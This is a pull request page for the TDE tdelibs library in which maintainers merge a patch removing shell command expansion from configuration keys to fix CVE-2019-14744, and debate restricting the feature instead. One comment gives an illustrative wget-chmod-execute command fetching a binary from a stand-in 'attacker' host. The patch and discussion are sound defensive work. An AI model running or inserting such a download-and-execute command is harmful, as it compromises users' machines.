TDE
/
tdelibs
7
1
Fork 0
Code Issues 16 Pull Requests 8 Releases Wiki Activity
Labels Milestones

Security: remove support for $(...) in config keys with [$e] marker. #46

Manually merged
SlavekB merged 1 commits from issue/45/CVE-2019-14744 into master 5 years ago
Conversation 5 Commits 1 Files Changed 2
SlavekB commented 5 years ago
Owner

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.
SlavekB added this to the R14.0.7 release milestone 5 years ago
SlavekB added the SL/critical label 5 years ago
SlavekB added a new dependency 5 years ago
#45 kde-kdesktopfile-command-injection
MicheleC commented 5 years ago
Owner

Looks good to me

Looks good to me
sunjob commented 5 years ago

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths:

/usr/...
/usr/local/...
/etc/...
$XDG_CONFIG_HOME
etc

And instead of implementing it as it should, you just deleted this functionality now. Wow...

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths: /usr/... /usr/local/... /etc/... $XDG_CONFIG_HOME etc And instead of implementing it as it should, you just deleted this functionality now. Wow...
SlavekB commented 5 years ago
Poster
Owner

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run regular /usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day.". Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run *regular* `/usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day."`. Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.
MicheleC commented 5 years ago
Owner

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic.

Removal seems the only sensible way to go.

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic. Removal seems the only sensible way to go.
sunjob commented 5 years ago

although maybe it’s better than having such a big hole :о)

although maybe it’s better than having such a big hole :о)
SlavekB closed this pull request 5 years ago
SlavekB closed this pull request 5 years ago
SlavekB deleted branch issue/45/CVE-2019-14744 5 years ago
The pull request has been manually merged as 1074eb0336.
Sign in to join this conversation.
Reviewers
Request review
No reviewers
Labels
Apply labels
Clear labels
GE/need-info
General - need additional info from contributor PR/keep-branch
Pull request - do not delete branch after merging PR/not-ok
Pull request - need fixing PR/rfc
Pull request - request for comments PR/update-trans
Pull request - update to translation files needed PR/wip
Pull request - work in progress RS/R14.0.x
Related to R14.0.x series RS/R14.1.x
Related to R14.1.x series SL/critical
Severity level - critical SL/major
Severity level - major SL/minor
Severity level - minor SL/normal
Severity level - normal SL/regression
Severity level - regression from previous version SL/trivial
Severity level - trivial SL/wishlist
Severity level - wishlist request ST/duplicate
Status - duplicate of another issue ST/invalid
Status - invalid report ST/notourproblem
Status - not our problem ST/rejected
Status - rejected ST/wontfix
Status - won't fix ST/worksforme
Status - works for me, unable to reproduce
No Label GE/need-info PR/keep-branch PR/not-ok PR/rfc PR/update-trans PR/wip RS/R14.0.x RS/R14.1.x SL/critical SL/major SL/minor SL/normal SL/regression SL/trivial SL/wishlist ST/duplicate ST/invalid ST/notourproblem ST/rejected ST/wontfix ST/worksforme
Milestone
Set milestone
Clear milestone
No items
No Milestone
R14.0.7 release
Assignees
Assign users
Clear assignees
No Assignees
3 Participants
Notifications
Due Date

No due date set.

Blocks
#45 kde-kdesktopfile-command-injection
TDE/tdelibs
Reference: TDE/tdelibs#46
Write Preview
Loading…
Cancel
Save
There is no content yet.
Delete Branch 'issue/45/CVE-2019-14744'

Deleting a branch is permanent. It CANNOT be undone. Continue?

No
Yes